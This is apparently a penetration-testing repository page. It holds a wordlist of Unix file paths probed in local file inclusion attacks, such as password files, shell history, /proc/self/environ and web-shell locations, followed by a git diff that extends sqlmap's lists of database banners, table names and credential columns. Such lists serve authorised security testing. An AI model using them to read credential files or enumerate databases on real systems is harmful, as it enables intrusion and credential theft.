https://repo.theoremforge.com/pentesting/tools/blob/0f1f0578739870b633c267789120d85982545a69/Uncategorized/Dump/lfiunix.txt + +/etc/apache2/.htpasswd +/etc/apache/.htpasswd +/etc/master.passwd +/etc/muddleftpd/muddleftpd.passwd +/etc/muddleftpd/passwd +/etc/passwd +/etc/passwd~ +/etc/passwd- +/etc/pureftpd.passwd +/etc/samba/private/smbpasswd +/etc/samba/smbpasswd +/etc/security/opasswd +/etc/security/passwd +/etc/smbpasswd +\Program Files\xampp\apache\conf\httpd.conf +/usr/local/pgsql/bin/pg_passwd +/usr/local/pgsql/data/passwd +/usr/pkgsrc/net/pureftpd/pureftpd.passwd +/usr/ports/contrib/pure-ftpd/pureftpd.passwd +/usr/ports/ftp/pure-ftpd/pureftpd.passwd +/usr/ports/net/pure-ftpd/pureftpd.passwd +/var/log/exim_rejectlog/etc/passwd +/etc/mysql/conf.d/old_passwords.cnf +/etc/password.master +/var/www/.lighttpdpassword +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default + +# Reference: 
https://pastebin.com/KgPsDXjg + +/etc/passwd +/etc/crontab +/etc/hosts +/etc/my.cnf +/etc/.htpasswd +/root/.bash_history +/etc/named.conf +/proc/self/environ +/etc/php.ini +/bin/php.ini +/etc/httpd/php.ini +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/local/etc/php.ini +/usr/local/lib/php.ini +/usr/local/php/lib/php.ini +/usr/local/php4/lib/php.ini +/usr/local/php5/lib/php.ini +/usr/local/apache/conf/php.ini +/etc/php4.4/fcgi/php.ini +/etc/php4/apache/php.ini +/etc/php4/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/apache2/php.ini +/etc/php/7.4/apache2/php.ini +/etc/php/php.ini +/usr/local/apache/conf/modsec.conf +/var/cpanel/cpanel.config +/proc/self/environ +/proc/self/fd/2 +/etc/ssh/sshd_config +/var/lib/mysql/my.cnf +/etc/mysql/my.cnf +/etc/my.cnf +/etc/logrotate.d/proftpd +/www/logs/proftpd.system.log +/var/log/proftpd +/etc/proftp.conf +/etc/protpd/proftpd.conf +/etc/vhcs2/proftpd/proftpd.conf +/etc/proftpd/modules.conf +/etc/vsftpd.chroot_list +/etc/vsftpd/vsftpd.conf +/etc/vsftpd.conf +/etc/chrootUsers +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/usr/sbin/pure-config.pl +/usr/etc/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.conf +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/pureftpd/etc/pure-ftpd.conf +/etc/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pureftpd.pdb +/etc/pureftpd.passwd +/etc/pure-ftpd/pureftpd.pdb +/var/log/ftp-proxy +/etc/logrotate.d/ftp +/etc/ftpchroot +/etc/ftphosts +/etc/smbpasswd +/etc/smb.conf +/etc/samba/smb.conf +/etc/samba/samba.conf +/etc/samba/smb.conf.user +/etc/samba/smbpasswd +/etc/samba/smbusers +/var/lib/pgsql/data/postgresql.conf +/var/postgresql/db/postgresql.conf +/etc/ipfw.conf +/etc/firewall.rules +/etc/ipfw.rules +/usr/local/etc/webmin/miniserv.conf +/etc/webmin/miniserv.conf +/usr/local/etc/webmin/miniserv.users +/etc/webmin/miniserv.users +/etc/squirrelmail/config/config.php +/etc/squirrelmail/config.php +/etc/httpd/conf.d/squirrelmail.conf +/usr/share/squirrelmail/config/config.php +/private/etc/squirrelmail/config/config.php +/srv/www/htdos/squirrelmail/config/config.php + +# Web shells + +/var/www/html/backdoor.php +/var/www/html/b374k.php +/var/www/html/c99.php +/var/www/html/cmd.php +/var/www/html/r57.php +/var/www/html/shell.php +/var/www/html/wso.php + +# Misc + +/app/app.js +/app/configure.js +/app/config/config.json +/etc/grafana/grafana.ini +/opt/kibana/config/kibana.yml +/etc/kibana/kibana.yml +/etc/elasticsearch/elasticsearch.yml diff --git a/txt/common-outputs.txt b/data/txt/common-outputs.txt similarity index 88% rename from txt/common-outputs.txt rename to data/txt/common-outputs.txt index 55770e2b278..bd5061b8bf7 100644 --- a/txt/common-outputs.txt +++ b/data/txt/common-outputs.txt @@ -1,5 +1,5 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission [Banners] @@ -11,32 +11,84 @@ 5.0. 5.1. 5.5. +5.6. +5.7. 6.0. +8.0. +8.1. +8.2. +8.3. +8.4. +9.0. +9.1. +9.2. +9.3. # PostgreSQL +PostgreSQL 7.0 +PostgreSQL 7.1 +PostgreSQL 7.2 PostgreSQL 7.3 PostgreSQL 7.4 +PostgreSQL 8.0 PostgreSQL 8.1 PostgreSQL 8.2 PostgreSQL 8.3 PostgreSQL 8.4 +PostgreSQL 8.5 +PostgreSQL 9.0 +PostgreSQL 9.1 +PostgreSQL 9.2 +PostgreSQL 9.3 +PostgreSQL 9.4 +PostgreSQL 9.5 +PostgreSQL 9.6 +PostgreSQL 10. +PostgreSQL 11. +PostgreSQL 12. 
+PostgreSQL 13. +PostgreSQL 14. +PostgreSQL 15. +PostgreSQL 16. +PostgreSQL 17. # Oracle Oracle Database 9i Standard Edition Release +Oracle Database 9i Standard Edition Release 9. Oracle Database 9i Express Edition Release +Oracle Database 9i Express Edition Release 9. Oracle Database 9i Enterprise Edition Release +Oracle Database 9i Enterprise Edition Release 9. Oracle Database 10g Standard Edition Release +Oracle Database 10g Standard Edition Release 10. Oracle Database 10g Express Edition Release Oracle Database 10g Enterprise Edition Release +Oracle Database 10g Enterprise Edition Release 10. Oracle Database 11g Standard Edition Release +Oracle Database 11g Standard Edition Release 11. Oracle Database 11g Express Edition Release +Oracle Database 11g Express Edition Release 11. Oracle Database 11g Enterprise Edition Release +Oracle Database 11g Enterprise Edition Release 11. +Oracle Database 12c +Oracle Database 18c +Oracle Database 19c +Oracle Database 21c +Oracle Database 23ai +Oracle Database 26ai # Microsoft SQL Server Microsoft SQL Server 7.0 Microsoft SQL Server 2000 Microsoft SQL Server 2005 Microsoft SQL Server 2008 +Microsoft SQL Server 2012 +Microsoft SQL Server 2014 +Microsoft SQL Server 2016 +Microsoft SQL Server 2017 +Microsoft SQL Server 2019 +Microsoft SQL Server 2022 +Microsoft SQL Server 2025 [Users] @@ -366,6 +418,7 @@ XDBWEBSERVICES # MySQL information_schema +performance_schema mysql phpmyadmin @@ -386,6 +439,10 @@ ReportServer ReportServerTempDB tempdb +# Cloud Defaults +rdsadmin +innodb +azure_maintenance [Tables] @@ -454,6 +511,44 @@ pma_relation pma_table_coords pma_table_info +# Wordpress +wp_users +wp_posts +wp_comments +wp_options +wp_postmeta +wp_terms +wp_term_taxonomy +wp_term_relationships +wp_links +wp_commentmeta + +# WooCommerce +wp_woocommerce_sessions +wp_woocommerce_api_keys +wp_woocommerce_attribute_taxonomies + +# Magento +catalog_product_entity +sales_order +sales_order_item +customer_entity +quote + +# Drupal +node +users +field_data_body +field_revision_body +taxonomy_term_data +taxonomy_vocabulary + +# Joomla +joomla_users +joomla_content +joomla_categories +joomla_modules + # PostgreSQL pg_aggregate pg_am @@ -467,6 +562,8 @@ pg_cast pg_class pg_constraint pg_conversion +pg_cron_job +pg_cron_job_run_detail pg_database pg_depend pg_description @@ -488,6 +585,7 @@ pg_rewrite pg_shdepend pg_shdescription pg_statistic +pg_stat_statements pg_tablespace pg_trigger pg_ts_config @@ -1020,6 +1118,29 @@ vVendor WorkOrder WorkOrderRouting +# Common tables + +accounts +admin +audit +backup +config +configuration +customers +data +files +history +images +log +logs +members +messages +orders +products +settings +test +tokens +uploads [Columns] @@ -1160,3 +1281,52 @@ smallint text time timestamp + +# Common columns +active +address +admin +blocked +category_id +city +confirmed +country +created_at +created_on +customer_id +deleted +deleted_at +dob +email +enabled +first_name +flag +gender +hidden +is_active +is_deleted +is_published +last_name +locked +login +modified_on +name +order_id +password +phone +private +product_id +public +role +salt +state +status +timestamp +token +type +updated_at +user_id +username +visible +zip +zip_code diff --git a/txt/common-tables.txt b/data/txt/common-tables.txt similarity index 81% rename from txt/common-tables.txt rename to data/txt/common-tables.txt index 8d0eacae0bb..855593c6af3 100644 --- a/txt/common-tables.txt +++ b/data/txt/common-tables.txt @@ -1,5 +1,5 @@ -# Copyright (c) 2006-2013 sqlmap developers 
(http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission users customer @@ -218,32 +218,23 @@ delivery_quality queries identification friends -vcd_Screenshots PERSON course_section -vcd_PornCategories -pma_history jiveRemoteServerConf channels object chip_layout -osc_products_options_values_to_products_options login user_newtalk -vcd_MetaDataTypes entrants Device imageInfo developers -div_experiment items_template defaults osc_products -vcd_MetaData mucRoomProp -QRTZ_JOB_DETAILS settings -pma_bookmark DEPENDENT imageCategoryList islandIn @@ -254,7 +245,6 @@ wp_posts package mucRoom vendortax -vcd_Comments attrs config_seq company @@ -262,18 +252,13 @@ register checksum_results ENROLLMENT operation -primarytest -vcd_CoverTypes binaries COURSE_SECTION Students func enrollment -pma_table_coords readers action_element -vcd_VcdToPornstars -osc_categories_description friend_statuses Domain servers @@ -284,33 +269,26 @@ resources mixins sys_options_cats licenses -pma_relation SIGNON clients Apply -vcd_CoversAllowedOnMediatypes ThumbnailKeyword form_definition_text -vcd_Log system jiveOffline tickers BANNERDATA mucAffiliation -fk_test_has_pk rooms objectcache collection_item_count -div_stock_parent jiveRoster Volume lookup investigator math jivePrivate -vcd_UserWishList osc_manufacturers_info -primarytest2 PROFILE categories_posts Flight @@ -322,64 +300,44 @@ client cv_country_synonyms osc_categories interwiki -logtest archive members_networks -vcd_MovieCategories language_text UserType friend -div_annotation_type osc_products_description osc_products_to_categories -QRTZ_PAUSED_TRIGGER_GRPS article recentchanges -vcd_UserLoans media -vcd_SourceSites conducts sales CurrentUsers Country -vcd_IMDB -vcd_Borrowers querycache Publication Pilot -div_stock Regions DEPT_LOCATIONS -vcd_Users master_table -vcd_VcdToUsers funny_jokes jos_vm_payment_method -vcd_UserProperties osc_products_images specialty -pma_pdf_pages visits -div_allele_assay -vcd_MediaTypes ipblocks WidgetPrices -form_definition_version_text experiment Publisher control protocol_action jivePrivacyList -vcd_VcdToPornStudios subImageInfo plugin_sid message_statuses state GalleryThumb hitcounter -vcd_Pornstars -QRTZ_BLOB_TRIGGERS -div_generation jiveGroupProp ingredients community_item_count @@ -387,13 +345,9 @@ jiveExtComponentConf SEQUENCE Continent rights -div_statistic_type Path osc_manufacturers logging -colnametests -QRTZ_FIRED_TRIGGERS -div_locality sailors Description warehouse @@ -406,54 +360,41 @@ CUSTOMERS jiveProperty app_user keyboards -div_unit_of_measure categorylinks grants Action -div_trait -div_trait_uom WidgetReferences product_type developers_projects userAttribute -vcd_Sessions form_data_archive -vcd_PornStudios action_attribute Thumbnail jiveGroupUser computers -QRTZ_LOCKS -vcd_PropertiesToUser customertax sector networks columns_priv globals -div_obs_unit_sample Widgets TERM salgrade -div_passport -vcd_UserRoles mucMember imagelinks exchange Status WORKS_ON lines -booleantests -QRTZ_SIMPLE_TRIGGERS +testusers mobile_menu staff -vcd_VcdToPornCategories tblusers hashes partner Product personnel ads -vcd_Covers osc_specials Keyword supplier @@ -461,61 +402,45 @@ agent_specialty pokes profile_pictures oldimage -div_poly_type -osc_products_attributes_download -div_allele isMember -vcd_Images userImageRating detail_table osc_products_attributes -pma_table_info officer -div_obs_unit -vcd_Settings 
COURSE Time locatedOn medicalprocedure -fk_test_has_fk mergesWith author UserFieldsInfo Employee oe -QRTZ_TRIGGERS insurance SUPPLIER -div_aa_annotation song imageAttribute views_track extremes -vcd_VcdToSources jiveRosterGroups webcal_config phpbb_ranks triggers_template appVersions -vcd_RssFeeds DUMMY ROLE activity study_text osc_products_options City -QRTZ_SCHEDULER_STATE osc_reviews edge questions partof blobs -QRTZ_CRON_TRIGGERS tag userSession vcd -pma_column_info -auto_id_tests job site_stats mucConversationLog @@ -523,16 +448,12 @@ sequence madewith OperationStatus SPJ -turizmi_ge zutat_cocktail -DWE_Internal_WF_Attributes zipcodes insertids ChemList product_category -foreigntest2 hero -cmContentVersionDigitalAsset reports devel_logsql f_sequence @@ -541,7 +462,6 @@ ClassificationScheme ez_webstats_conf credential utilise -cmDigitalAsset ACL_table service_request_log feedback @@ -568,29 +488,21 @@ dtb_order files_config PropColumnMap result -pma_designer_coords triggers audittrail -f_attributedependencies -organization_type_package_map -DWE_Corr_Sets userlist backgroundJob_table sf_guard_user_permission my_lake -DWE_Corr_Tokens sampleData -qrtz_blob_triggers reciprocal_partnersites rss_categories ADMIN -site_map_ge Factory_Output geo_Estuary phpbb_themes forum ClientsTable -mushroom_trainset rating_track iplinks maxcodevento @@ -601,7 +513,6 @@ cmLanguage phpbb_points_config guava_sysmodules querycachetwo -soc_da_polit_ge BOOK_AUTHORS records reciprocal_config @@ -630,7 +541,6 @@ expression Simple_Response photoo photos -child_config_traffic_selector version_data allocation dtb_category_total_count @@ -646,7 +556,6 @@ webcal_view pagecontent Collection maxcodcurso -self_government_ge phpbb_user_group InstanceStringTable bldg_types @@ -655,10 +564,8 @@ mailaddresses section m_type configlist -cmRepositoryContentTypeDefinition trade Parameter -jforum_privmsgs tbl_works_categories help_category bkp_String @@ -673,11 +580,9 @@ vendor_seq guava_theme_modules dtb_pagelayout bookings -cmPublicationDetail writes writer distance -DWE_Resource_Attributes jforum_groups Polynomial river @@ -698,23 +603,14 @@ SchemaInfo WidgetDescriptions dtb_category_count sidebar -R1Weights -humanitaruli_ge -cmTransactionHistory facets jforum_roles -samedicino_ge -qrtz_job_listeners geo_Lake religion nuke_gallery_media_class cia DatabaseInfo -R2TF THOT_THEME -R1Length -cmContentRelation -S2ODTMAP enrolled liste_domaines DEMO_PROJECTS @@ -737,7 +633,6 @@ UM_ROLE_ATTRIBUTES SCALE maclinks books -DWE_Predecessors interactions graphs_items stars @@ -756,7 +651,6 @@ email CustomerCards mtb_zip Campus -R1Size hardware dtb_other_deliv pricegroup @@ -770,15 +664,10 @@ colour command audio egresado -aggtest transport -zusti_da_sabuneb_ge -div_scoring_tech_type -R2Weights schedule routers zips -DWE_Delay_Timers Descriptions software wh_der_children @@ -805,7 +694,6 @@ cmSiteNode nodes sbreciprocal_cats rss_read -DWE_Workflow_Documents bombing tblblogtrackbacks fragment @@ -822,7 +710,6 @@ dtb_kiyaku EmailAddress Sea powers -QRTZ_CALENDARS reserve LINEITEM project_user_xref @@ -834,7 +721,6 @@ user_rights tf_messages Class_Def_Table geo_lake -copytest tissue ligneDeFacture PZ_Data @@ -844,7 +730,6 @@ cmts photo dtb_bloc user_preferences -music_ge D_Abbreviation data_set_association site_location @@ -859,7 +744,6 @@ evidence files test intUsers -div_treatment tblblogentries cocktail_person cdv_curated_allele @@ -870,18 +754,15 @@ MetadataValue curso redirect accountuser -qrtz_cron_triggers StateType forum_user_stat 
Descriptions_Languages m_users_profile Booked_On -not_null_with_default_test tblblogroles organizations topic economy -DWE_Org_Resources Model maxcodcorreo RATING @@ -899,7 +780,6 @@ dtb_send_customer cart size pg_ts_cfgmap -LimitTest2 QUESTION DC_Data webcal_group_user @@ -912,7 +792,6 @@ document m_users_acct vendor_types fruit -DWE_Resources Service PART cell_line @@ -929,21 +808,17 @@ statuses webcal_user customurl THOT_YEAR -DWE_Subscriptions correo -kultura_ge Factory_Master inv_lines_seq certificates webcal_asst ostypes POINT_SET -R2IDF forum_flag bugs taxonomy UM_ROLES -div_synonym payer tf_log job_title @@ -952,7 +827,6 @@ wp_options forum_user_activity trackbacks wp_pod_fields -cmAvailableServiceBindingSiteNodeTypeDefinition translation cdv_passport_group User_ @@ -962,31 +836,24 @@ my_county zoph_people account_permissions ORDERLINES -ganatlebe_ge wp_term_relationships pictures product_font Departure -mushroom_test_results routerbenchmarks bkp_Item Channel_Data realtable -mushroom_NBC_class odetails user_type_link -eco_da_biz_ge belong ezin_users time_zone_transition ew_tabelle ezsearch_return_count_new -cmSystemUserRole m_users -div_accession_collecting Economy tbl_works_clients -qrtz_locks geo_Mountain dtb_category tmp @@ -995,10 +862,7 @@ geo_Desert dtb_payment forum_topic ezsearch_search_phrase_new -jforum_attach -sazog_urtiertoba_ge Equipment -iuridiuli_ge MetadataSchemaRegistry basePlusCommissionEmployees addresses @@ -1029,7 +893,6 @@ SpecificationLink videos sf_guard_remember_key employer -monitoringi_ge leases phpbb_smilies stats @@ -1040,32 +903,25 @@ line_items_seq ndb_binlog_index zoph_categories help_topic -div_treatment_uom transaction wp_links -DWE_Organizations -live_ge cdv_allele_curated_allele timeperiod item_master_seq GLI_profiles cv_countries -qrtz_scheduler_state journal tf_users mwuser stories dtb_table_comment -jforum_quota_limit Lake SQLDATES phpbb_search_wordmatch friend2 functions comboboxes -DWE_Max_Id std_item -foreigntest jiveVersion sf_guard_group Classification @@ -1082,13 +938,10 @@ webcal_entry_repeats room domain_info SALES -DWE_Tasks profession1 SUPPORT_INCIDENTS PERMISSION Defect -DWE_Task_Attributes -grandchild_test Desert KARTA UM_ROLE_PERMISSIONS @@ -1098,23 +951,19 @@ guava_themes alltypes webcal_view_user vrls_xref_country -R1TF subject continent D_Format dtb_recommend_products Linkdesc_table -qrtz_fired_triggers TelephoneNumber dtb_customer_mail_temp copyrights -jforum_extension_groups DEMO_ASSIGNMENTS guava_group_assignments jforum_extensions zutat ew_user -duptest alerts partsvendor jiveGroup @@ -1134,7 +983,6 @@ tblblogentriesrelated guava_packages GRouteDetail cdv_reason -nulltest membership bkp_RS_Servers vrls_listing_images @@ -1144,7 +992,6 @@ group ClassificationNode dtb_best_products cv_cropping_system -DWE_Workflows egresadoxidiomaxhabilidad locus_data dtb_order_temp @@ -1166,14 +1013,12 @@ dtb_csv_sql synchro_type langlinks genres_in_movies -qrtz_triggers Province answerOption wp_postmeta ERDESIGNER_VERSION_ID calendar cmEvent -ruletest forum_user SalesReps ew_gruppi @@ -1204,9 +1049,7 @@ genres field vertex FoundThumbs -qrtz_trigger_listeners reciprocal_links -DWE_Meta_Data Course idiomaxegresado ordreReparation @@ -1234,16 +1077,13 @@ Language mountain ad_locales ExtrinsicObject -R2Size geo_island derived_types snipe_gallery_cat -qrtz_job_details guava_roleviews production_wtype AccountXML1 wh_man_children -not_null_test product_colour_multi ike_configs intUseringroup @@ -1273,7 +1113,6 @@ PREFIX_order_return_state 
experimental_data_set DOCUMENT_FIELDS Scripts -mushroom_dataset desert Can_Fly synchro_element @@ -1283,7 +1122,6 @@ tblblogpages f_attributedefinition intGroups way_nodes -child_test THOT_TARGET MOMENT dtb_classcategory @@ -1294,7 +1132,6 @@ dtb_deliv webcal_categories Parts invoices -QRTZ_JOB_LISTENERS ANSWER tbl_categories yearend @@ -1315,7 +1152,6 @@ nuke_gallery_categories areas cmContentVersion checksum_history -mushroom_test_results_agg accessTable cameFromTable services_links @@ -1327,17 +1163,13 @@ adv lake tests Offices -qrtz_simple_triggers Editor -sazog_urtiertoba_ge2 wp_pod_pages Extlangs seq_gen rss_subscription Station_Comment -R1IDF jforum_config -cmServiceDefinitionAvailableServiceBinding geo_River facilities connectorlinks @@ -1351,25 +1183,20 @@ FORM_QUESTION history_str f_classtype endpoints -R2Length zoph_albums bkp_ItemPresentation tblblogcategories -div_taxonomy traffic_selectors FORM -qrtz_paused_trigger_grps creditcards people_reg country_partner jforum_users -array_test dtb_mail_history priorities relations combustiblebois slow_log -DWE_Resource_Roles WROTE flow pay_melodies @@ -1378,7 +1205,6 @@ variable_interest dtb_class ZENTRACK_VARFIELD catalogue -uplebata_dacva_ge wp_usermeta time_zone games @@ -1398,7 +1224,6 @@ cmContentTypeDefinition radacct peer_config_child_config cmAvailableServiceBinding -cmSiteNodeVersion Poles_Zeros ipmacassocs m_news @@ -1411,22 +1236,18 @@ ipassocs cmSystemUser phpbb_categories FoundLists -jforum_smilies channelitems lokal subcategory Languages jiveSASLAuthorized -DWE_WF_Attributes cocktail cust_order -mushroom_testset THOT_SOURCE product_font_multi presence UM_USERS jiveUser -cmSiteNodeTypeDefinition wp_comments dtb_bat_order_daily_hour jos_vm_category @@ -1437,8 +1258,6 @@ geo_river MonitorStatus pagelinks ways -DWE_Roles -jforum_vote_desc cities PREFIX_order_return_state_lang subscriber @@ -1458,14 +1277,12 @@ production_multiple page_log_exclusion furniture nuke_gallery_pictures -cmRepositoryLanguage oc os PREFIX_tab_lang lc_fields framework_email datasets -sporti_ge externallinks geo_desert politics @@ -1477,7 +1294,6 @@ m_with program combustible ezin_articles -pma_tracking help_keyword POSITION stars_in_movies @@ -1487,12 +1303,10 @@ dtb_mailtemplate DIM_TYPE cart_table D_Unit -array_probe macassocs changeTva UM_PERMISSIONS geo_Source -R1Sum cdv_marker nuke_gallery_template_types UM_USER_ATTRIBUTES @@ -1513,7 +1327,6 @@ transcache dtb_question_result rss_category profiling -QRTZ_TRIGGER_LISTENERS THOT_LANGUAGE cmContent Descriptions_Scripts @@ -1535,7 +1348,6 @@ po_seq salariedEmployees grp jforum_topics -defertest array_data most_recent_checksum m_earnings @@ -1543,13 +1355,10 @@ product_related dtb_baseinfo webcal_import_data federationApplicants -qrtz_calendars melodies jforum_forums sf_guard_group_permission sys_acl_matrix -R2ODTMAP -mushroom_NBC country_diseases dtb_order_detail sic @@ -1570,11 +1379,8 @@ jforum_categories site_climatic phpbb_points_values zoph_color_schemes -DWE_Internal_Task_Attributes -uniquetest TypeRule dtb_customer -R2Sum PREFIX_customer_group ProjectsTable dtb_products @@ -1583,13 +1389,11 @@ dtb_question UM_USER_PERMISSIONS exam commande -viktorina_ge dtb_products_class subscribe page_restrictions querycache_info cdv_map_feature -oidtest Link_table guava_users connectormacassocs @@ -1615,8 +1419,12 @@ SPACE geo_Sea DATA_ORG Contributor +wallet +balance +flag # Various Joomla tables + jos_vm_product_download jos_vm_coupons jos_vm_product_reviews @@ -1642,9 +1450,6 @@ jos_vm_zone_shipping 
jos_bannertrack jos_vm_order_status jos_modules_menu -jos_vm_product_type -jos_vm_product_type_parameter -jos_vm_tax_rate jos_core_log_items jos_modules jos_users @@ -1710,6 +1515,7 @@ publicusers cmsusers # List provided by Anastasios Monachos (anastasiosm@gmail.com) + blacklist cost moves @@ -1761,6 +1567,7 @@ TBLCORPUSERS TBLCORPORATEUSERS # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py) + tbladmins sort _wfspro_admin @@ -1820,6 +1627,7 @@ jos_comprofiler_members jos_joomblog_users jos_moschat_users knews_lostpass +korisnik korisnici kpro_adminlogs kpro_user @@ -1964,7 +1772,6 @@ JamPass MyTicketek MyTicketekArchive News -Passwords by usage count PerfPassword PerfPasswordAllSelected Promotion @@ -1988,12 +1795,10 @@ sysconstraints syssegments tblRestrictedPasswords tblRestrictedShows -Ticket System Acc Numbers TimeDiff Titles ToPacmail1 ToPacmail2 -Total Members UserPreferences uvw_Category uvw_Pref @@ -2002,7 +1807,6 @@ Venue venues VenuesNew X_3945 -stone list tblArtistCategory tblArtists tblConfigs @@ -2038,7 +1842,6 @@ bulletin cc_info login_name admuserinfo -userlistuser_list SiteLogin Site_Login UserAdmin @@ -2047,6 +1850,7 @@ Login Logins # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html + account accnts accnt @@ -2116,6 +1920,7 @@ user_pwd user_passwd # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047) + wsop Admin Config @@ -2208,6 +2013,7 @@ admin_pwd admin_pass adminpassword admin_password +admin_passwords usrpass usr_pass pass @@ -2258,7 +2064,6 @@ upload uploads file akhbar -sb_host_admin Firma contenu Kontakt @@ -2319,8 +2124,6 @@ pw pwd1 jhu webapps -ASP -Microsoft sing singup singin @@ -2340,11 +2143,6 @@ systime Tisch Tabellen Titel -u -u_n -u_name -u_p -u_pass Benutzer user_pw Benutzerliste @@ -2355,7 +2153,6 @@ Benutzername Benutzernamen vip Webbenutzer -sb_host_adminActiveDataFeed Kategorie Land Suchoptionen @@ -2366,7 +2163,6 @@ Umfrage TotalMembers Veranstaltungsort Veranstaltungsorte -Ansicht1 utilisateur trier compte @@ -2412,33 +2208,13 @@ Sujets Sondage Titres Lieux -Affichage1Affichage1edu -win -pc -windows -mac -edu -bayviewpath -bayview server -slserver -ColdFusion8 -ColdFusion -Cold -Fusion8 -Fusion ststaff -sb_host_adminAffichage1 -Affichage1 yhm yhmm -Affichage1name -sb_host_adminAffichage1name - -# site:jp -TypesTab # site:it + utenti categorie attivita @@ -2446,140 +2222,66 @@ comuni discipline Clienti gws_news -SGA_XPLAN_TPL_V$SQL_PLAN emu_services nlconfig -oil_bfsurvey_pro -oil_users -oil_menu_types -oil_polls Accounts -oil_core_log_searches -SGA_XPLAN_TPL_V$SQL_PLAN_SALL -oil_phocadownload_categories gws_page -oil_bfsurveypro_choices -oil_poll_data -oil_poll_date argomento -oil_modules ruolo -oil_contact_details emu_profiles user_connection -oil_poll_menu jos_jf_tableinfo -oil_templates_menu -oil_messages_cfg -oil_biolmed_entity_types -oil_phocagallery_votes -oil_core_acl_aro regioni -oil_modules_menu dati gws_admin -oil_phocagallery_user_category articoli -oil_content_frontpage cron_send -oil_biolmed_measures comune -SGA_XPLAN_TPL_DBA_TABLES esame -oil_session -oil_phocadownload_licenses -oil_weblinks -oil_messages -oil_phocagallery_votes_statistics dcerpcbinds -oil_jf_content -SGA_XPLAN_TPL_DBA_CONS_COLUMNS -SGA_XPLAN_TPL_DBA_IND_COLUMNS gruppi Articoli gws_banner gws_category soraldo_ele_tipo db_version -SGA_XPLAN_TPL_DBA_TAB_COLS -oil_biolmed_thesis jos_languages mlmail -SGA_XPLAN_TPL_V$SQLTEXT_NL -oil_bannertrack -oil_core_log_items -oil_rokversions -oil_bfsurveypro_34 -oil_bfsurveypro_35 
-oil_google_destinations gws_product -oil_jf_tableinfo -oil_phocadownload -oil_biolmed_blocks -oil_bfsurvey_pro_example -oil_bfsurvey_pro_categories -oil_bannerclient -oil_core_acl_aro_sections -SGA_XPLAN_TPL_V$SQL -oil_biolmed_land connections not_sent_mails -sga_xplan_test -oil_languages utente documento gws_purchase -oil_plugins -oil_phocagallery -oil_menu -oil_biolmed_measures_by_entity_types offers anagrafica gws_text -oil_groups -oil_content_rating sent_mails -oil_banner -oil_google gws_jobs eventi mlattach -oil_migration_backlinks -oil_phocagallery_categories downloads mlgroup -oil_sections decodifica_tabelle -oil_phocagallery_img_votes -oil_phocagallery_img_votes_statistics -oil_dbcache -oil_content p0fs -oil_biolmed_entity -oil_rokdownloads -oil_core_acl_groups_aro_map gws_client decodifica_campi -oil_phocagallery_comments -oil_categories -oil_newsfeeds -oil_biolmed_measurements -oil_phocadownload_user_stat -oil_core_acl_aro_groups -SGA_XPLAN_TPL_V$SQL_PLAN_STAT -oil_core_acl_aro_map dcerpcrequests -oil_phocadownload_sections -oil_components discipline_utenti jos_jf_content -oil_phocadownload_settings -SGA_XPLAN_TPL_DBA_CONSTRAINTS -oil_biolmed_technician -oil_stats_agents -SGA_XPLAN_TPL_DBA_INDEXES # site:fr + +facture +factures +devis +commande +bon_commande +bon_livraison +fournisseur +panier +paiement +reglement Avion departement Compagnie @@ -2750,137 +2452,57 @@ spip_ortho_dico spip_caches # site:ru + +spravochnik +nomenklatura +dokument +zakaz +ostatki +kontragenty +klient +uslugi +provodki +obrabotka +sklad +zhurnal guestbook -binn_forum_settings -binn_forms_templ -binn_catprops currency -binn_imagelib -binn_news phpshop_opros_categories -binn_articles_messages -binn_cache -binn_bann_temps -binn_forum_threads voting -binn_update terms -binn_site_users_rights -binn_vote_options -binn_texts -binn_forum_temps -binn_order_temps -binn_basket -binn_order -binn_system_log -binn_vote_results -binn_articles phpshop_categories -binn_maillist_temps -binn_system_messages -binn_articles_temps -binn_search_temps banners -binn_imagelib_templ -binn_faq -binn_bann phpshop_news -binn_menu_templ -binn_maillist_settings -binn_docs_temps -binn_bann_restricted phpshop_system -binn_calendar_temps -binn_forum_posts -binn_cform_settings phpshop_baners phpshop_menu -binn_forms_fields -binn_cform_list -binn_vote phpshop_links mapdata -binn_submit_timeout -binn_forum_themes_temps -binn_order_elems -binn_templates -binn_cform -binn_catalog_template -binn_ct_templ_elems -binn_template_elems -binn_rubrikator_tlevel -binn_settings -binn_pages -binn_users -binn_categs -binn_page_elems -binn_site_users_temps -binn_vote_temps -binn_rubrikator_temps -binn_faq_temps -binn_sprav setup_ -binn_basket_templ -binn_forum_maillist -binn_news_temps phpshop_users -binn_catlinks -binn_sprav_temps -binn_maillist_sent -binn_forms_templ_elems jubjub_errors -binn_maillist -binn_catrights -binn_docs -binn_bann_pages -binn_ct_templ -binn_menu -binn_user_rights -binn_cform_textarea -binn_catalog_fields vykachka -binn_menu_tlevel phpshop_opros -binn_form39 -binn_site_users -binn_path_temps order_item # site:de + tt_content kunde medien Mitarbeiter fe_users -dwp_wetter -dwp_popup voraussetzen 